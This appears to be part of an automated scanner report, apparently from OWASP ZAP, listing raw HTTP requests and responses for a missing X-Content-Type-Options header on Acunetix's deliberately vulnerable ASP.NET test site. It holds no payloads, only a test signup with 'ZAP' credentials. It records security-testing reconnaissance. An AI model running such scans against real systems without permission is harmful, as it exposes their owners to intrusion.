Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 